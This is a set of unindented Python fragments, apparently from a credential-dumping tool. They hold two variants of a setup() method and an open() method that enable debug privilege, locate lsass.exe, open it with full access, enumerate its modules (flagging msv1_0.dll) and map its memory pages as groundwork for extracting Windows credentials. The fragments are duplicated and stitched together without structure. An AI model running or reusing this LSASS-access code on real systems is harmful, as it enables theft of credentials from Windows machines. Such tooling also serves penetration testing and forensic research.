def setup(self):
logging.log(1, 'Enabling debug privilege')
enable_debug_privilege()
logging.log(1, 'Getting generic system info')
sysinfo = GetSystemInfo()
self.processor_architecture = PROCESSOR_ARCHITECTURE(
sysinfo.id.w.wProcessorArchitecture)
logging.log(1, 'Getting build number')
#self.BuildNumber = GetVersionEx().dwBuildNumber #this one doesnt work reliably on frozen binaries :(((
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\')
buildnumber, t = winreg.QueryValueEx(key, 'CurrentBuildNumber')
self.BuildNumber = int(buildnumber)
logging.log(1, 'Searching for lsass.exe')
pid = get_lsass_pid()
logging.log(1, 'Lsass.exe found at PID %d' % pid)
logging.log(1, 'Opening lsass.exe')
self.lsass_process_handle = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
if self.lsass_process_handle is None:
raise Exception('Failed to open lsass.exe Reason: %s' %
WinError(get_last_error()))
logging.log(1, 'Enumerating modules')
module_handles = EnumProcessModules(self.lsass_process_handle)
for module_handle in module_handles:
module_file_path = GetModuleFileNameExW(self.lsass_process_handle,
module_handle)
logging.log(1, module_file_path)
timestamp = 0
if ntpath.basename(module_file_path).lower() == 'msv1_0.dll':
timestamp = int(os.stat(module_file_path).st_ctime)
self.msv_dll_timestamp = timestamp
modinfo = GetModuleInformation(self.lsass_process_handle,
module_handle)
self.modules.append(
Module.parse(module_file_path, modinfo, timestamp))
logging.log(1, 'Found %d modules' % len(self.modules))
current_address = sysinfo.lpMinimumApplicationAddress
while current_address < sysinfo.lpMaximumApplicationAddress:
page_info = VirtualQueryEx(self.lsass_process_handle,
current_address)
self.pages.append(Page.parse(page_info))
current_address += page_info.RegionSize
logging.log(1, 'Found %d pages' % len(self.pages))
for page in self.pages:
#self.log(str(page))
for mod in self.modules:
if mod.inrange(page.BaseAddress) == True:
mod.pages.append(page)
def open(self):
self.sysinfo = GetSystemInfo()
self.processor_architecture = PROCESSOR_ARCHITECTURE(self.sysinfo.id.w.wProcessorArchitecture)
if self.phandle is None:
if self.pid is None:
if self.name is None:
raise Exception('Process name or PID or opened handle must be provided')
self.pid = pid_for_name(self.name)
self.phandle = OpenProcess(self.access, False, self.pid)
if self.phandle is None:
raise Exception('Failed to open %s(%s) Reason: %s' % (ctypes.WinError(), self.name, self.pid))
def setup(self):
logging.log(1, 'Enabling debug privilege')
enable_debug_privilege()
logging.log(1, 'Getting generic system info')
sysinfo = GetSystemInfo()
self.processor_architecture = PROCESSOR_ARCHITECTURE(
sysinfo.id.w.wProcessorArchitecture)
logging.log(1, 'Getting build number')
#self.BuildNumber = GetVersionEx().dwBuildNumber #this one doesnt work reliably on frozen binaries :(((
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\')
buildnumber, t = winreg.QueryValueEx(key, 'CurrentBuildNumber')
self.BuildNumber = int(buildnumber)
if self.process_handle is None:
if self.process_pid is None:
if self.process_name is None:
raise Exception(
'Process name or PID or opened handle must be provided'
)
logging.log(1, 'Searching for lsass.exe')
self.process_pid = pid_for_name(self.process_name)
logging.log(
1, '%s found at PID %d' %
(self.process_name, self.process_pid))
logging.log(1, 'Checking Lsass.exe protection status')
#proc_protection_info = get_protected_process_infos(pid)
#protection_msg = "Protection Status: No protection"
#if proc_protection_info:
# protection_msg = f"Protection Status: {proc_protection_info['type']}"
# if 'signer' in proc_protection_info:
# protection_msg += f" ({proc_protection_info['signer']})"
# raise Exception('Failed to open lsass.exe Reason: %s' % protection_msg)
#logging.log(1, protection_msg)
logging.log(1, 'Opening %s' % self.process_name)
self.process_handle = OpenProcess(PROCESS_ALL_ACCESS, False,
self.process_pid)
if self.process_handle is None:
raise Exception('Failed to open lsass.exe Reason: %s' %
ctypes.WinError())
else:
logging.debug('Using pre-defined handle')
logging.log(1, 'Enumerating modules')
module_handles = EnumProcessModules(self.process_handle)
for module_handle in module_handles:
module_file_path = GetModuleFileNameExW(self.process_handle,
module_handle)
logging.log(1, module_file_path)
timestamp = 0
if ntpath.basename(module_file_path).lower() == 'msv1_0.dll':
timestamp = int(os.stat(module_file_path).st_ctime)
self.msv_dll_timestamp = timestamp
modinfo = GetModuleInformation(self.process_handle, module_handle)
self.modules.append(
Module.parse(module_file_path, modinfo, timestamp))
logging.log(1, 'Found %d modules' % len(self.modules))
current_address = sysinfo.lpMinimumApplicationAddress
while current_address < sysinfo.lpMaximumApplicationAddress:
page_info = VirtualQueryEx(self.process_handle, current_address)
self.pages.append(Page.parse(page_info))
current_address += page_info.RegionSize
logging.log(1, 'Found %d pages' % len(self.pages))
for page in self.pages:
for mod in self.modules:
if mod.inrange(page.BaseAddress) == True:
mod.pages.append(page)